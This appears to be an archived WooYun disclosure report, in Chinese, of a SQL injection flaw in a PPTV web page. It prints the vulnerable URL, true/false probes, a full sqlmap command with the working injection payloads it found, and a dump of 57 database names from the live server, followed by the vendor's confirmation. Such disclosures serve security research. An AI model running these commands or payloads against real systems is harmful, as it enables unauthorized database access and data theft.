乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-12-02: 细节已通知厂商并且等待厂商处理中 2013-12-02: 厂商已经确认,细节仅向厂商公开 2013-12-12: 细节向核心白帽子及相关领域专家公开 2013-12-22: 细节向普通白帽子公开 2014-01-01: 细节向实习白帽子公开 2014-01-16: 细节向公众公开
好多好多裤子。。。放开这妹子,让你来,可敢?
注入点:http://zone.pptv.com/molicui/works/getone?id=1285get参数id存在注入通知存在注入点,未做进一步测试!http://zone.pptv.com/molicui/works/getone?id=1285 and 1=1 //TRUEhttp://zone.pptv.com/molicui/works/getone?id=1285 and 1=2 //FALSE上sqlmap
python sqlmap.py -u "http://zone.pptv.com/molicui/works/getone?id=1285" --flush-session --user-agent="Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" --dbs --batch---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1285 AND 6504=6504 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: id=-3795 UNION ALL SELECT NULL,NULL,CONCAT(0x7165707371,0x476f447471476f7a6c71,0x7176756371),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: id=1285; SELECT SLEEP(5)-- Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1285 AND SLEEP(5)---back-end DBMS: MySQL 5.0.11available databases [57]: [*] information_schema[*] inny[*] inyy[*] pp_hezuo_bench[*] pp_hezuo_guangfa[*] pp_hezuo_porsche[*] pp_hezuo_shj[*] pp_hezuo_swarovski[*] pp_hezuo_watsons[*] pp_watsons[*] pp_zo_beach[*] pp_zo_cocacola[*] pp_zo_hkqc[*] pp_zo_ie9[*] pp_zo_inyy[*] pp_zo_jw[*] pp_zo_kia[*] pp_zo_ksf[*] pp_zo_lenovo[*] pp_zo_lottery[*] pp_zo_nanhang[*] pp_zo_pxld[*] pp_zo_shop[*] pp_zo_taotao[*] pp_zo_tianwang[*] pp_zo_tytdr[*] pp_zo_vmei[*] pp_zo_xinsilu[*] pp_zo_yf[*] pp_zo_zfxf[*] pp_zo_zhenqiao[*] pp_zone[*] pp_zone_public[*] pplive_10yi[*] pplive_bianxing[*] pplive_btvcw[*] pplive_ctf[*] pplive_durex[*] pplive_ef[*] pplive_flowers[*] pplive_gdb[*] pplive_guangfa[*] pplive_heiren[*] pplive_jingcai[*] pplive_jingcai_new[*] pplive_jinzhong[*] pplive_kefu[*] pplive_ksf[*] pplive_modelmatch[*] pplive_oth_jxzh[*] pplive_paipai[*] pplive_rss[*] pplive_seventh[*] pplive_taifu[*] pplive_talent[*] pplive_talent2011[*] pplive_worldcup
过滤
危害等级:中
漏洞Rank:5
确认时间:2013-12-02 12:45
多谢提醒,我们已跟进处理!
暂无